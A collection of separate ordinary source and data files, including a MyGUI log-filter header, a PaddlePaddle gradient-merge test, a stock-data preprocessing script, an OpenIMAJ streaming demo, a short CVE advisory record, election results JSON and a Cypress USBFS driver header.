* Distributed under the MIT License
* (See accompanying file COPYING.MIT or copy at http://opensource.org/licenses/MIT)
*/
#ifndef MYGUI_LEVEL_LOG_FILTER_H_
#define MYGUI_LEVEL_LOG_FILTER_H_
#include "MyGUI_Prerequest.h"
#include "MyGUI_ILogFilter.h"
namespace MyGUI
{
class MYGUI_EXPORT LevelLogFilter :
public ILogFilter
{
public:
LevelLogFilter();
//! @copydoc ILogFilter::shouldLog(const std::string& _section, LogLevel _level, const struct tm* _time, const std::string& _message, const char* _file, int _line)
bool shouldLog(const std::string& _section, LogLevel _level, const struct tm* _time, const std::string& _message, const char* _file, int _line) override;
/** Set logging level.
@param _value messages with this or higher level will be logged.
*/
void setLoggingLevel(LogLevel _value);
/** Get logging level.
@return Messages with this or higher level are logged.
*/
LogLevel getLoggingLevel() const;
private:
LogLevel mLevel;
};
} // namespace MyGUI
#endif // MYGUI_LEVEL_LOG_FILTER_H_
| 403
|
17,085
|
<filename>python/paddle/fluid/tests/unittests/dist_mnist_gradient_merge_raw_optimizer.py
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import paddle.fluid as fluid
import paddle.distributed.fleet as fleet
import numpy as np
from test_dist_base import TestDistRunnerBase, runtime_main
from dist_mnist import cnn_model
class TestDistMnistGradientMergeRawOptimizer(TestDistRunnerBase):
def get_model(self, batch_size=2, single_device=False):
paddle.enable_static()
paddle.seed(1)
np.random.seed(1)
assert fluid.core.globals()['FLAGS_apply_pass_to_program']
strategy = fleet.DistributedStrategy()
build_strategy = paddle.static.BuildStrategy()
settings = {
"fuse_relu_depthwise_conv": True,
"fuse_bn_act_ops": True,
"fuse_bn_add_act_ops": True,
"fuse_elewise_add_act_ops": True,
"fuse_all_optimizer_ops": True,
"enable_addto": True,
"enable_inplace": True,
}
for k, v in settings.items():
setattr(build_strategy, k, v)
strategy.build_strategy = build_strategy
strategy.gradient_merge = True
avg = os.environ['enable_gm_avg'] == "True"
strategy.gradient_merge_configs = {
"k_steps": 2,
"avg": avg,
}
strategy.without_graph_optimization = True
fleet.init(is_collective=True, strategy=strategy)
image = paddle.static.data(
name='image', shape=[None, 1, 28, 28], dtype="float32")
label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
predict = cnn_model(image)
acc = paddle.metric.accuracy(predict, label)
loss_fn = nn.CrossEntropyLoss(use_softmax=False)
cost = loss_fn(predict, label)
test_program = paddle.static.default_main_program().clone(for_test=True)
optimizer = paddle.optimizer.Adam(learning_rate=1e-3)
if single_device:
optimizer = fluid.optimizer.GradientMergeOptimizer(
optimizer,
k_steps=strategy.gradient_merge_configs["k_steps"],
avg=strategy.gradient_merge_configs["avg"])
world_size = 1
else:
optimizer = fleet.distributed_optimizer(optimizer)
world_size = fleet.world_size()
optimizer.minimize(cost)
if world_size > 1:
assert paddle.static.default_main_program().num_blocks == 2
gm_block = paddle.static.default_main_program().block(1)
start_allreduce_idx = None
for i, op in enumerate(gm_block.ops):
if op.type == "c_allreduce_sum":
start_allreduce_idx = i
break
# the magic number 1 below means skip the c_sync_calc_stream op
if avg:
assert start_allreduce_idx > 1
else:
assert start_allreduce_idx == 1
train_reader = paddle.batch(
paddle.dataset.mnist.test(), batch_size=batch_size)
test_reader = paddle.batch(
paddle.dataset.mnist.test(), batch_size=batch_size)
return test_program, cost, train_reader, test_reader, acc, predict
if __name__ == "__main__":
runtime_main(TestDistMnistGradientMergeRawOptimizer)
| 1,728
|
1,165
|
"""Module for running the data retrieval and preprocessing.
Scripts that performs all the steps to get the train and perform preprocessing.
"""
import logging
import argparse
import sys
import shutil
import os
#pylint: disable=no-name-in-module
from helpers import preprocess
from helpers import storage as storage_helper
def parse_arguments(argv):
"""Parse command line arguments
Args:
argv (list): list of command line arguments including program name
Returns:
The parsed arguments as returned by argparse.ArgumentParser
"""
parser = argparse.ArgumentParser(description='Preprocessing')
parser.add_argument('--bucket',
type=str,
help='GCS bucket where preprocessed data is saved',
default='<your-bucket-name>')
parser.add_argument('--cutoff_year',
type=str,
help='Cutoff year for the stock data',
default='2010')
parser.add_argument('--kfp',
dest='kfp',
action='store_true',
help='Kubeflow pipelines flag')
args, _ = parser.parse_known_args(args=argv[1:])
return args
def run_preprocess(argv=None):
"""Runs the retrieval and preprocessing of the data.
Args:
args: args that are passed when submitting the training
Returns:
"""
logging.info('starting preprocessing of data..')
args = parse_arguments(sys.argv if argv is None else argv)
tickers = ['snp', 'nyse', 'djia', 'nikkei', 'hangseng', 'ftse', 'dax', 'aord']
closing_data = preprocess.load_data(tickers, args.cutoff_year)
time_series = preprocess.preprocess_data(closing_data)
logging.info('preprocessing of data complete..')
logging.info('starting uploading of the preprocessed data on GCS..')
temp_folder = 'data'
if not os.path.exists(temp_folder):
os.mkdir(temp_folder)
file_path = os.path.join(temp_folder, 'data_{}.csv'.format(args.cutoff_year))
time_series.to_csv(file_path, index=False)
storage_helper.upload_to_storage(args.bucket, temp_folder)
shutil.rmtree(temp_folder)
if args.kfp:
with open("/blob_path.txt", "w") as output_file:
output_file.write(file_path)
logging.info('upload of the preprocessed data on GCS completed..')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
run_preprocess()
| 914
|
319
|
<reponame>Celebrate-future/openimaj<filename>demos/sandbox/src/main/java/org/openimaj/demos/sandbox/ml/linear/learner/stream/experiments/FinancialStreamLearningExperiment.java
/**
* Copyright (c) 2011, The University of Southampton and the individual contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without modification,
* are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of the University of Southampton nor the names of its
* contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package org.openimaj.demos.sandbox.ml.linear.learner.stream.experiments;
import java.io.IOException;
import java.net.MalformedURLException;
import java.util.List;
import java.util.Map;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.IncrementalLearnerFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.IncrementalLearnerWorldSelectingEvaluator;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.ModelStats;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.YahooFinanceStream;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterPredicateFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterPreprocessingFunction;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.TwitterStatusAsUSMFStatus;
import org.openimaj.demos.sandbox.ml.linear.learner.stream.twitter.USMFStatusBagOfWords;
import org.openimaj.ml.linear.evaluation.SumLossEvaluator;
import org.openimaj.ml.linear.learner.BilinearLearnerParameters;
import org.openimaj.ml.linear.learner.init.HardCodedInitStrat;
import org.openimaj.ml.linear.learner.init.SingleValueInitStrat;
import org.openimaj.ml.linear.learner.init.SparseZerosInitStrategy;
import org.openimaj.stream.provider.twitter.TwitterStreamDataset;
import org.openimaj.tools.twitter.modes.filter.LanguageFilter;
import org.openimaj.tools.twitter.modes.preprocessing.LanguageDetectionMode;
import org.openimaj.tools.twitter.modes.preprocessing.StopwordMode;
import org.openimaj.tools.twitter.modes.preprocessing.TokeniseMode;
import org.openimaj.twitter.USMFStatus;
import org.openimaj.util.api.auth.DefaultTokenFactory;
import org.openimaj.util.api.auth.common.TwitterAPIToken;
import org.openimaj.util.concurrent.ArrayBlockingDroppingQueue;
import org.openimaj.util.data.Context;
import org.openimaj.util.function.Operation;
import org.openimaj.util.function.context.ContextFunctionAdaptor;
import org.openimaj.util.function.context.ContextListFilter;
import org.openimaj.util.function.context.ContextListFunction;
import org.openimaj.util.pair.Pair;
import org.openimaj.util.stream.Stream;
import org.openimaj.util.stream.combine.ContextStreamCombiner;
import org.openimaj.util.stream.window.ContextRealTimeWindowFunction;
import org.openimaj.util.stream.window.WindowAverage;
import twitter4j.Status;
/**
* @author <NAME> (<EMAIL>)
*
*/
public class FinancialStreamLearningExperiment {
/**
* @param args
* @throws MalformedURLException
* @throws IOException
*/
public static void main(String[] args) throws MalformedURLException, IOException {
// The financial stream
final ContextRealTimeWindowFunction<Map<String, Double>> yahooWindow = new ContextRealTimeWindowFunction<Map<String, Double>>(
5000);
final Stream<Context> yahooAveragePriceStream = new YahooFinanceStream("AAPL", "GOOG")
.transform(yahooWindow)
.map(
new ContextFunctionAdaptor<List<Map<String, Double>>, Map<String, Double>>(
new WindowAverage(), "item",
"averageticks"
)
);
// The Twitter Stream
final ArrayBlockingDroppingQueue<Status> buffer = new ArrayBlockingDroppingQueue<Status>(1);
final LanguageDetectionMode languageDetectionMode = new LanguageDetectionMode();
final StopwordMode stopwordMode = new StopwordMode();
final TokeniseMode tokeniseMode = new TokeniseMode();
final Stream<Context> twitterUserWordCountStream = new TwitterStreamDataset(
DefaultTokenFactory.get(TwitterAPIToken.class), buffer
)
.transform(new ContextRealTimeWindowFunction<Status>(5000))
.map(
new ContextListFunction<Status, USMFStatus>(new TwitterStatusAsUSMFStatus(), "item",
"usmfstatuses"
)
)
.map(
new ContextListFunction<USMFStatus, USMFStatus>(new TwitterPreprocessingFunction(languageDetectionMode, tokeniseMode,
stopwordMode),
"usmfstatuses"
)
)
.map(new ContextListFilter<USMFStatus>(new TwitterPredicateFunction(new LanguageFilter("en")),
"usmfstatuses"
)
)
.map(
new ContextFunctionAdaptor<List<USMFStatus>, Map<String, Map<String, Double>>>(new USMFStatusBagOfWords(new StopwordMode()),
"usmfstatuses",
"bagofwords"
)
);
final BilinearLearnerParameters params = new BilinearLearnerParameters();
params.put(BilinearLearnerParameters.ETA0_U, 0.02);
params.put(BilinearLearnerParameters.ETA0_W, 0.02);
params.put(BilinearLearnerParameters.LAMBDA, 0.001);
params.put(BilinearLearnerParameters.BICONVEX_TOL, 0.01);
params.put(BilinearLearnerParameters.BICONVEX_MAXITER, 10);
params.put(BilinearLearnerParameters.BIAS, true);
params.put(BilinearLearnerParameters.ETA0_BIAS, 0.5);
params.put(BilinearLearnerParameters.WINITSTRAT, new SingleValueInitStrat(0.1));
params.put(BilinearLearnerParameters.UINITSTRAT, new SparseZerosInitStrategy());
final HardCodedInitStrat biasInitStrat = new HardCodedInitStrat();
params.put(BilinearLearnerParameters.BIASINITSTRAT, biasInitStrat);
// The combined stream
ContextStreamCombiner
.combine(twitterUserWordCountStream, yahooAveragePriceStream)
.map(
new IncrementalLearnerWorldSelectingEvaluator(new SumLossEvaluator(),
new IncrementalLearnerFunction(params)))
.forEach(new Operation<Context>() {
@Override
public void perform(Context c) {
final ModelStats object = c.getTyped("modelstats");
System.out.println("Loss: " + object.score);
System.out.println("Important words: ");
for (final String task : object.importantWords.keySet()) {
final Pair<Double> minmax = object.taskWordMinMax.get(task);
System.out.printf("... %s (%1.4f->%1.4f) %s\n",
task,
minmax.firstObject(),
minmax.secondObject(),
object.importantWords.get(task)
);
}
}
});
}
}
| 2,723
|
892
|
{
"schema_version": "1.2.0",
"id": "GHSA-4hqp-qgvw-892g",
"modified": "2022-05-07T00:01:05Z",
"published": "2022-04-27T00:00:20Z",
"aliases": [
"CVE-2021-26628"
],
"details": "Insufficient script validation of the admin page enables XSS, which causes unauthorized users to steal admin privileges. When uploading file in a specific menu, the verification of the files is insufficient. It allows remote attackers to upload arbitrary files disguising them as image files.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-26628"
},
{
"type": "WEB",
"url": "https://www.krcert.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=66673"
}
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"severity": "MODERATE",
"github_reviewed": false
}
}
| 452
|
348
|
<reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Villeparisis","circ":"7ème circonscription","dpt":"Seine-et-Marne","inscrits":14363,"abs":9014,"votants":5349,"blancs":84,"nuls":24,"exp":5241,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":1701},{"nuance":"FN","nom":"Mme <NAME>","voix":912},{"nuance":"FI","nom":"<NAME>","voix":777},{"nuance":"LR","nom":"<NAME>","voix":658},{"nuance":"SOC","nom":"<NAME>","voix":386},{"nuance":"COM","nom":"Mme <NAME>","voix":330},{"nuance":"ECO","nom":"<NAME>","voix":138},{"nuance":"DIV","nom":"M. <NAME>","voix":96},{"nuance":"DVD","nom":"M. <NAME>","voix":91},{"nuance":"DLF","nom":"Mme <NAME>","voix":78},{"nuance":"EXG","nom":"Mme <NAME>","voix":39},{"nuance":"DIV","nom":"<NAME>","voix":27},{"nuance":"DVD","nom":"<NAME>","voix":5},{"nuance":"DIV","nom":"M. <NAME>","voix":3}]}
| 332
|
3,567
|
<reponame>intensifier/ohm
{
"private": true,
"workspaces": [
"packages/cli",
"packages/ohm-js",
"examples/ecmascript",
"examples/es-module",
"examples/markdown",
"examples/operators",
"examples/simple-lisp",
"examples/typescript"
],
"scripts": {
"build": "yarn workspace ohm-js run build",
"ci-test": "yarn build && yarn lint && yarn test",
"format": "prettier --write . && eslint --fix .",
"lint": "eslint .",
"test": "yarn workspaces run test"
},
"devDependencies": {
"eslint": "^7.31.0",
"eslint-config-google": "^0.14.0",
"eslint-plugin-ava": "^12.0.0",
"eslint-plugin-camelcase-ohm": "^0.2.1",
"eslint-plugin-no-extension-in-require": "^0.2.0",
"prettier": "^2.3.2"
}
}
| 363
|
3,897
|
<reponame>mcheah-bose/mbed-os<filename>targets/TARGET_Cypress/TARGET_PSOC6/mtb-pdl-cat1/drivers/include/cy_usbfs_dev_drv_reg.h
/***************************************************************************//**
* \file cy_usbfs_dev_drv_reg.h
* \version 2.20.2
*
* Provides register access API implementation of the USBFS driver.
*
********************************************************************************
* \copyright
* Copyright 2018-2020 Cypress Semiconductor Corporation
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
/** \cond INTERNAL */
/**
* \addtogroup group_usbfs_dev_drv_reg
* \{
*
* Register access API for the USBFS Device block.
*
* This is the API that provides an interface to the USBFS Device hardware.
* These API are intended to be used by the USBFS Device driver to access
* hardware. You can use these API to implement a custom driver based on
* the USBFS Device hardware.
*
* \defgroup group_usbfs_dev_drv_reg_macros Macros
* \{
* \defgroup group_usbfs_dev_drv_reg_macros_hardware Hardware-specific Constants
* \defgroup group_usbfs_dev_drv_reg_macros_sie_intr SIE Interrupt Sources
* \defgroup group_usbfs_dev_drv_reg_macros_sie_mode SIE Endpoint Modes
* \defgroup group_usbfs_dev_drv_reg_macros_arb_ep_intr Arbiter Endpoint Interrupt Sources
* \}
*
* \defgroup group_usbfs_drv_drv_reg_functions Functions
* \{
* \defgroup group_usbfs_drv_drv_reg_interrupt_sources SIE Interrupt Sources Registers Access
* \defgroup group_usbfs_drv_drv_reg_ep0_access Endpoint 0 Registers Access
* \defgroup group_usbfs_drv_drv_reg_sie_access SIE Data Endpoint Registers Access
* \defgroup group_usbfs_drv_drv_reg_arbiter Arbiter Endpoint Registers Access
* \defgroup group_usbfs_drv_drv_reg_arbiter_data Arbiter Endpoint Data Registers Access
* \defgroup group_usbfs_drv_drv_reg_misc Miscellaneous Functions
* \}
*
* \}
*/
#if !defined(CY_USBFS_DEV_DRV_REG_H)
#define CY_USBFS_DEV_DRV_REG_H
#include "cy_device.h"
#if defined (CY_IP_MXUSBFS) && defined (CY_IP_MXPERI)
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include "cy_syslib.h"
#if defined(__cplusplus)
extern "C" {
#endif
/*******************************************************************************
* Hardware-specific Constants
*******************************************************************************/
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_hardware
* \{
*/
/** Number of data endpoints supported by the hardware */
#define CY_USBFS_DEV_DRV_NUM_EPS_MAX (8U)
/** The hardware buffer size used for data endpoint buffers */
#define CY_USBFS_DEV_DRV_HW_BUFFER_SIZE (512U)
/** The hardware buffer for endpoint 0 */
#define CY_USBFS_DEV_DRV_EP0_BUFFER_SIZE (8U)
/** \} group_usbfs_dev_drv_reg_macros_hardware */
/*******************************************************************************
* Functions
*******************************************************************************/
/**
* \addtogroup group_usbfs_drv_drv_reg_interrupt_sources
* \{
*/
/* Access to LPM SIE interrupt sources */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterruptMask (USBFS_Type *base, uint32_t mask);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptMask (USBFS_Type const *base);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieInterruptStatusMasked(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieInterrupt (USBFS_Type *base, uint32_t mask);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieInterrupt (USBFS_Type *base, uint32_t mask);
/** \} group_usbfs_drv_drv_reg_interrupt_sources */
/**
* \addtogroup group_usbfs_drv_drv_reg_ep0_access
* \{
*/
/* Access control endpoint CR0.Mode registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Mode(USBFS_Type *base, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Mode(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEp0Count(USBFS_Type *base, uint32_t count, uint32_t toggle);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetEp0Count(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteEp0Data(USBFS_Type *base, uint32_t idx, uint32_t value);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_ReadEp0Data(USBFS_Type const *base, uint32_t idx);
/** \} group_usbfs_drv_drv_reg_ep0_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_sie_access
* \{
*/
/* Access SIE data endpoints CR0.Mode registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpMode (USBFS_Type *base, uint32_t endpoint, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpMode (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpStall (USBFS_Type *base, bool inDirection, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpStall(USBFS_Type *base, uint32_t endpoint, uint32_t mode);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpError (USBFS_Type const *base, uint32_t endpoint);
/* Access SIE data endpoints CNT0 and CNT1 registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpToggle (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpToggle(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieEpCount(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetSieEpCount(USBFS_Type *base, uint32_t endpoint, uint32_t count, uint32_t toggle);
/* Access SIE data endpoints interrupt source registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSieAllEpsInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableSieEpInterrupt (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableSieEpInterrupt(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearSieEpInterrupt (USBFS_Type *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_sie_access */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter
* \{
*/
/* Access Arbiter data endpoints interrupt sources registers */
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbAllEpsInterruptStatus(USBFS_Type const *base);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_EnableArbEpInterrupt (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_DisableArbEpInterrupt(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpInterruptMask(USBFS_Type *base, uint32_t endpoint, uint32_t mask);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptMask(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbEpInterruptStatusMasked(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbEpInterrupt(USBFS_Type *base, uint32_t endpoint, uint32_t mask);
/* Access Arbiter data endpoints configuration register */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbEpConfig (USBFS_Type *base, uint32_t endpoint, uint32_t cfg);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbCfgEpInReady (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_ClearArbCfgEpInReady (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_TriggerArbCfgEpDmaReq(USBFS_Type *base, uint32_t endpoint);
/* Access Arbiter data endpoints WA (Write Address and RA(Read Address) registers */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbWriteAddr(USBFS_Type *base, uint32_t endpoint, uint32_t wa);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetArbReadAddr (USBFS_Type *base, uint32_t endpoint, uint32_t ra);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbWriteAddr(USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetArbReadAddr (USBFS_Type const *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_arbiter */
/**
* \addtogroup group_usbfs_drv_drv_reg_arbiter_data
* \{
*/
/* Access data endpoints data registers. Used to get/put data into endpoint buffer */
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData (USBFS_Type *base, uint32_t endpoint, uint8_t byte);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_WriteData16(USBFS_Type *base, uint32_t endpoint, uint16_t halfword);
__STATIC_INLINE uint8_t Cy_USBFS_Dev_Drv_ReadData (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE uint16_t Cy_USBFS_Dev_Drv_ReadData16 (USBFS_Type const *base, uint32_t endpoint);
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataRegAddr (USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE volatile uint32_t * Cy_USBFS_Dev_Drv_GetDataReg16Addr(USBFS_Type *base, uint32_t endpoint);
__STATIC_INLINE void Cy_USBFS_Dev_Drv_FlushInBuffer (USBFS_Type *base, uint32_t endpoint);
/** \} group_usbfs_drv_drv_reg_arbiter_data */
/**
* \addtogroup group_usbfs_drv_drv_reg_misc
* \{
*/
__STATIC_INLINE void Cy_USBFS_Dev_Drv_SetEpType (USBFS_Type *base, bool inDirection, uint32_t endpoint);
__STATIC_INLINE uint32_t Cy_USBFS_Dev_Drv_GetSofNubmer(USBFS_Type const *base);
/** \} group_usbfs_drv_drv_reg_misc */
/*******************************************************************************
* API Constants
*******************************************************************************/
/** /cond INTERNAL */
/* Macro to access ODD offset registers: Cypress ID# 299773 */
#define CY_USBFS_DEV_DRV_WRITE_ODD(val) ( (val) | ((uint32_t) (val) << 8U) )
#define CY_USBFS_DEV_READ_ODD(reg) ( (uint32_t) (CY_LO8((reg) | ((reg) >> 8U))) )
/** /endcond */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_sie_intr
* \{
*/
#define CY_USBFS_DEV_DRV_INTR_SIE_SOF USBFS_USBLPM_INTR_SIE_SOF_INTR_Msk /**< SOF frame detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_BUS_RESET USBFS_USBLPM_INTR_SIE_BUS_RESET_INTR_Msk /**< Bus Reset detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_EP0 USBFS_USBLPM_INTR_SIE_EP0_INTR_Msk /**< EP0 access detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_LPM USBFS_USBLPM_INTR_SIE_LPM_INTR_Msk /**< Link Power Management request detected */
#define CY_USBFS_DEV_DRV_INTR_SIE_RESUME USBFS_USBLPM_INTR_SIE_RESUME_INTR_Msk /**< Resume condition detected */
/** \} group_usbfs_dev_drv_reg_macros_sie_intr */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_sie_mode
* \{
*/
/* Modes for endpoint 0 (control endpoint) */
#define CY_USBFS_DEV_DRV_EP_CR_DISABLE (0U) /**< Data endpoint disabled */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_INOUT (1U) /**< Data endpoint NAK IN and OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STALL_INOUT (3U) /**< Data endpoint STALL IN and OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STATUS_OUT_ONLY (2U) /**< Data endpoint ACK only Status OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_STATUS_IN_ONLY (6U) /**< Data endpoint ACK only Status IN requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_OUT_STATUS_IN (11U) /**< Data endpoint ACK only Data and Status OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_IN_STATUS_OUT (15U) /**< Data endpoint ACK only Data and Status IN requests */
/* Modes for ISO data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_ISO_OUT (5U) /**< Data endpoint is ISO OUT */
#define CY_USBFS_DEV_DRV_EP_CR_ISO_IN (7U) /**< Data endpoint is ISO IN */
/* Modes for Control/Bulk/Interrupt OUT data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_OUT (8U) /**< Data endpoint NAK OUT requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_OUT (9U) /**< Data endpoint ACK OUT requests */
/* Modes for Control/Bulk/Interrupt IN data endpoints */
#define CY_USBFS_DEV_DRV_EP_CR_NAK_IN (12U) /**< Data endpoint NAK IN requests */
#define CY_USBFS_DEV_DRV_EP_CR_ACK_IN (13U) /**< Data endpoint ACK IN requests */
/** \} group_usbfs_dev_drv_reg_macros_sie_mode */
/**
* \addtogroup group_usbfs_dev_drv_reg_macros_arb_ep_intr ARB_EP_SR/INT_EN 1-8 registers
* \{
*/
/** Data endpoint IN buffer full interrupt source */
#define USBFS_USBDEV_ARB_EP_IN_BUF_FULL_Msk USBFS_USBDEV_ARB_EP1_INT_EN_IN_BUF_FULL_EN_Msk
/** Data endpoint grant interrupt source (DMA complete read/write) */
#define USBFS_USBDEV_ARB_EP_DMA_GNT_Msk USBFS_USBDEV_ARB_EP1_INT_EN_DMA_GNT_EN_Msk
/** Data endpoint overflow interrupt source (applicable only for Automatic DMA mode) */
#define USBFS_USBDEV_ARB_EP_BUF_OVER_Msk USBFS_USBDEV_ARB_EP1_INT_EN_BUF_OVER_EN_Msk
/** Data endpoint underflow interrupt source (applicable only for Automatic DMA mode) */
#define USBFS_USBDEV_ARB_EP_BUF_UNDER_Msk USBFS_USBDEV_ARB_EP1_INT_EN_BUF_UNDER_EN_Msk
/** Endpoint Error in Transaction interrupt source */
#define USBFS_USBDEV_ARB_EP_ERR_Msk USBFS_USBDEV_ARB_EP1_INT_EN_ERR_INT_EN_Msk
/** Data endpoint terminate interrupt source (DMA complete reading) */
